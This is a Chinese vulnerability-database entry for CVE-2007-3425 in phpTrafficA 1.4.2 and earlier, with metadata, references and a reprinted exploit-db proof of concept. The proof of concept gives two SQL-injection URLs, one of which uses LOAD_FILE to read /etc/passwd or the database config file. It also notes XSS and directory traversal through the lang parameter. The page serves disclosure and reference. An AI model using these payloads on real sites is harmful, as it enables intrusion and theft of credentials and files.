phpTrafficA index.php 目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113180 漏洞类型 路径遍历
发布时间 2007-06-24 更新时间 2007-06-28
CVE编号 CVE-2007-3425 CNNVD-ID CNNVD-200706-462
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/4100
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200706-462
|漏洞详情
phpTrafficA的index.php中存在目录遍历漏洞。远程攻击者可以借助lang参数,包含任意的本地文件。
|漏洞EXP
Application: phpTrafficA <= 1.4.2
Web Site: http://soft.zoneo.net/phpTrafficA/
Versions: all
Platform: linux, windows
Bug: injection sql



-------------------------------------------------------

1) Introduction
2) Bug
3) Proof of concept
4) Credits

===========
1) Introduction
===========

"phpTrafficA is a GPL statistical tool for web traffic analysis, written in php and mySQL.
It can track access counts to your website, search engines, keywords, and referrers that lead to you,
operating systems, web browsers, visitor retention, path analysis, and a lot more!"

======
2) Bug
======

injection sql



=====
3)proof of concept
=====


exemple of exploitation :
1)http://site.com/index.php?mode=stats&sid=THE_WEB_SITE_SID_HERE&show=page&pageid=-32+union+select+1,@@version/*

2)http://site.com/index.php?mode=stats&sid=THE_WEB_SITE_SID_HERE&show=page&pageid=-32+union+select+1,LOAD_FILE(0x2F6574632F706173737764)/*
--> load some file as /etc/passwd or /path/www/stats/Php/config_sql.php

?lang= is also vulnerable to xss attacks, and as Hamid Ebadi has mention $lang is also vulnerable to directory transversal

=====
4)Credits
=====

laurent gaffie
contact : laurent.gaffie@gmail.com

# milw0rm.com [2007-06-24]
|参考资料

来源:VIM
名称:20070626vendorACKforphpTrafficAissues
链接:http://www.attrition.org/pipermail/vim/2007-June/001684.html
来源:soft.zoneo.net
链接:http://soft.zoneo.net/phpTrafficA/Files/get.php?phpTrafficA-1.4.3.tgz
来源:MILW0RM
名称:4100
链接:http://www.milw0rm.com/exploits/4100
来源:XF
名称:phptraffica-index-directory-traversal(35014)
链接:http://xforce.iss.net/xforce/xfdb/35014
来源:BUGTRAQ
名称:20070624phpTrafficA<1.4.2
链接:http://www.securityfocus.com/archive/1/archive/1/472211/100/0/threaded
来源:VUPEN
名称:ADV-2007-2311
链接:http://www.frsirt.com/english/advisories/2007/2311
来源:SECUNIA
名称:25773
链接:http://secunia.com/advisories/25773